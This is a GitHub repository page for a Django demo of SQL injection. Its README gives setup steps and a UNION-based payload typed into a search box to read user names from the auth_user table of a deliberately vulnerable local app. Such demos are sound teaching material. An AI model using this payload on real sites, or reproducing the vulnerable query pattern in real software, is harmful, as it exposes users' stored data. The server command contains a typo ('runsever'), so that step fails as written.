GitHub - caleb15/sql-injection-attack-demo: A Django SQL Injection Attack Demo

How to perform a SQL Injection Attack

Steps

pip install Django
python manage.py runsever
http://127.0.0.1:8000/items/search
SELECT name FROM orders_item WHERE name LIKE '%' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '%'
Search for "z' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '"

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
orders		orders
project		project
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
db.sqlite3		db.sqlite3
manage.py		manage.py

Provide feedback